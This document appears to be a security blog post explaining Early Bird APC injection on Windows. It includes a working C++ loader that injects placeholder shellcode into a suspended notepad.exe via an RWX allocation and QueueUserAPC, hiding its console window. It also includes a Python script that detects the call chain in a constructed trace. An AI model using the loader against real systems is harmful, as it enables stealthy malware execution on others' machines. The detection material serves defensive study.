APC Injection: Early Bird

Early Bird is a simple but powerful technique. It is essentially a variant of APC injection combined with thread hijacking: during thread initialization the ntdll function NtTestAlert (undocumented) is called, which drains and processes the thread's APC queue, so the injected code normally runs before the entry point of the process's main thread and takes control of the process.

Execution flow:
- Create a suspended process (usually a legitimate Windows process)
- Allocate a readable, writable and executable memory region inside the suspended process
- Write the shellcode into the allocated region
- Queue an APC to the process's main thread
- Resume the suspended thread

C++ implementation:
```cpp
#include <Windows.h>
#include <iostream>
// Build as a GUI-subsystem binary so that no console window is shown
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] = <shellcode>; // placeholder, as in the original
int main()
{
    LPCSTR lpApplication = "C:\\Windows\\notepad.exe"; // path of notepad.exe on a 32-bit machine
    SIZE_T shellcodeLen = sizeof(shellcode);
    STARTUPINFOA sInfo = { 0 };
    sInfo.cb = sizeof(sInfo);
    PROCESS_INFORMATION pInfo = { 0 };
    // Step 1: create the target process in the suspended state
    if (!CreateProcessA(lpApplication, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sInfo, &pInfo))
    {
        std::cerr << "CreateProcessA failed: " << GetLastError() << std::endl;
        return 1;
    }
    HANDLE hProc = pInfo.hProcess;
    HANDLE hThread = pInfo.hThread;
    // Step 2: allocate an RWX region in the suspended process
    LPVOID lpvShellAddress = VirtualAllocEx(hProc, NULL, shellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (lpvShellAddress == NULL)
    {
        std::cerr << "VirtualAllocEx failed: " << GetLastError() << std::endl;
        return 1;
    }
    PTHREAD_START_ROUTINE ptApcRoutine = (PTHREAD_START_ROUTINE)lpvShellAddress;
    // Step 3: copy the shellcode into that region
    WriteProcessMemory(hProc, lpvShellAddress, shellcode, shellcodeLen, NULL);
    // Step 4: queue the APC on the (still suspended) main thread
    QueueUserAPC(PAPCFUNC(ptApcRoutine), hThread, NULL);
    // Step 5: resume the thread; the APC is processed during thread initialization
    ResumeThread(hThread);
    CloseHandle(hThread);
    CloseHandle(hProc);
    return 0;
}
```
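From a detection standpoint, the useful signal is the ordered chain of calls above issued by one process against a child it created suspended: CreateProcess with CREATE_SUSPENDED, VirtualAllocEx with PAGE_EXECUTE_READWRITE in the child, WriteProcessMemory into the child, QueueUserAPC on the child's initial thread, then ResumeThread. The script below is an added example, not code from the original post: it runs that sequence check over a constructed API-monitor trace. The trace format (`<time> pid=<n> <API>(key=value,...)`) and the field names `child_pid`, `child_tid`, `target_pid`, `target_tid`, `flags`, `protect` are assumptions for this example, not the output of any real EDR or Sysmon event.

```python
"""Flag the Early Bird API call chain in a constructed API-monitor trace (added example)."""
import re

CREATE_SUSPENDED = 0x00000004        # CreateProcess creation flag
PAGE_EXECUTE_READWRITE = 0x40        # RWX page protection
FULL_CHAIN = {"suspended_create", "rwx_alloc", "remote_write", "apc_queued"}

# Constructed sample trace; the line format and field names are assumptions for this example.
SAMPLE_TRACE = """\
10:00:01 pid=4242 CreateProcessA(image=C:\\Windows\\notepad.exe,flags=0x4,child_pid=5100,child_tid=5104)
10:00:01 pid=4242 VirtualAllocEx(target_pid=5100,size=0x1000,protect=0x40)
10:00:01 pid=4242 WriteProcessMemory(target_pid=5100,size=0x1000)
10:00:01 pid=4242 QueueUserAPC(target_tid=5104)
10:00:01 pid=4242 ResumeThread(target_tid=5104)
10:00:02 pid=7777 CreateProcessA(image=C:\\Windows\\notepad.exe,flags=0x0,child_pid=5200,child_tid=5204)
10:00:02 pid=7777 ResumeThread(target_tid=5204)
10:00:03 pid=9001 CreateProcessA(image=C:\\Windows\\cmd.exe,flags=0x4,child_pid=5300,child_tid=5304)
10:00:03 pid=9001 ResumeThread(target_tid=5304)
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) (?P<api>\w+)\((?P<args>.*)\)$")


def parse_line(line):
    """Parse one trace line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for kv in m.group("args").split(","):
        if "=" in kv:
            key, value = kv.split("=", 1)
            args[key] = value
    return {"ts": m.group("ts"), "pid": int(m.group("pid")),
            "api": m.group("api"), "args": args}


def find_early_bird(trace):
    """Return one finding per suspended child that gets resumed, with the stages observed.

    A finding is marked is_early_bird only when every stage of the chain was seen
    between the suspended CreateProcess and the ResumeThread.
    """
    tracked = {}   # (caller_pid, child_pid) -> state for a child created suspended
    by_tid = {}    # (caller_pid, child_tid) -> key into tracked
    findings = []
    for raw in trace.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        pid, api, a = ev["pid"], ev["api"], ev["args"]
        if api.startswith("CreateProcess"):
            flags = int(a.get("flags", "0"), 16)
            if flags & CREATE_SUSPENDED:
                key = (pid, int(a["child_pid"]))
                tracked[key] = {"tid": int(a["child_tid"]), "image": a.get("image", "?"),
                                "stages": {"suspended_create"}}
                by_tid[(pid, int(a["child_tid"]))] = key
        elif api == "VirtualAllocEx":
            key = (pid, int(a.get("target_pid", -1)))
            if key in tracked and int(a.get("protect", "0"), 16) == PAGE_EXECUTE_READWRITE:
                tracked[key]["stages"].add("rwx_alloc")
        elif api == "WriteProcessMemory":
            key = (pid, int(a.get("target_pid", -1)))
            if key in tracked:
                tracked[key]["stages"].add("remote_write")
        elif api == "QueueUserAPC":
            key = by_tid.get((pid, int(a.get("target_tid", -1))))
            if key is not None:
                tracked[key]["stages"].add("apc_queued")
        elif api == "ResumeThread":
            tid_key = (pid, int(a.get("target_tid", -1)))
            key = by_tid.pop(tid_key, None)
            if key is not None:
                state = tracked.pop(key)
                stages = state["stages"]
                findings.append({"caller_pid": key[0], "child_pid": key[1],
                                 "image": state["image"], "stages": sorted(stages),
                                 "is_early_bird": stages == FULL_CHAIN})
    return findings


if __name__ == "__main__":
    for f in find_early_bird(SAMPLE_TRACE):
        print(f)
```

Only a suspended child that is later resumed produces a finding; the pid 7777 case (normal, non-suspended create) is ignored, and pid 9001 (suspended create and resume with no allocation, write or APC) is reported with a partial stage list so an analyst can tune how much of the chain is required before alerting. Legitimate debuggers and some installers also create suspended processes, so the full chain, not CREATE_SUSPENDED alone, is the condition worth alerting on.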
